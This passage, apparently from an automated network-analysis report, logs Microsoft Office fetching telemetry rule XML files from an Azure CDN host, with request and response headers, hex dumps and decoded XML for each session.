                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  130192.168.2.44991113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:00 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1393
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                  ETag: "0x8DC582BE3E55B6E"
                                                                                                                  x-ms-request-id: 0d0c2c5f-f01e-0020-0d06-36956b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000eq0s
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  131192.168.2.44991313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:01 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1393
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                  ETag: "0x8DC582BE39DFC9B"
                                                                                                                  x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-16547b76f7fr4g8xhC1DFW9cqc0000000hwg00000000cc91
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  132192.168.2.44991513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:01 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC515INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1356
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                  ETag: "0x8DC582BDF66E42D"
                                                                                                                  x-ms-request-id: f6edb455-601e-0002-0aa1-34a786000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-r178fb8d765tq2dphC1DFW278s00000002cg00000000f7yb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  133192.168.2.44991613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:01 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1395
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BE017CAD3"
                                                                                                                  x-ms-request-id: 5c63f72a-901e-0067-46a3-34b5cb000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-1749fc9bdbd9f5rdhC1DFWbers00000002n000000000ek7c
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  134192.168.2.44991813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:01 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1358
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                  ETag: "0x8DC582BE6431446"
                                                                                                                  x-ms-request-id: 791f132d-601e-003e-49a7-343248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-r178fb8d765bflfthC1DFWuy9n00000002tg000000002avm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  135192.168.2.44991913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:01 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1395
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                  ETag: "0x8DC582BDE12A98D"
                                                                                                                  x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-16547b76f7fcjqqhhC1DFWrrrc0000000ku00000000012es
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  136192.168.2.44992013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:02 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1358
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BE022ECC5"
                                                                                                                  x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7f8dwtrhC1DFWd1zn0000000kv000000000ac7h
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  137192.168.2.44992113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:02 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC515INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1389
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE10A6BC1"
                                                                                                                  x-ms-request-id: f00fef9b-501e-0029-7e4b-36d0b8000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-r178fb8d765mr9nqhC1DFWs8m800000000v0000000009nuv
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  138192.168.2.44992313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:02 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1352
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                  ETag: "0x8DC582BE9DEEE28"
                                                                                                                  x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7fk9g8vhC1DFW825400000000n000000000csme
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  139192.168.2.44992413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:02 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1405
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE12B5C71"
                                                                                                                  x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7fj897nhC1DFWdwq40000000keg00000000mh9p
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  140192.168.2.44992513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
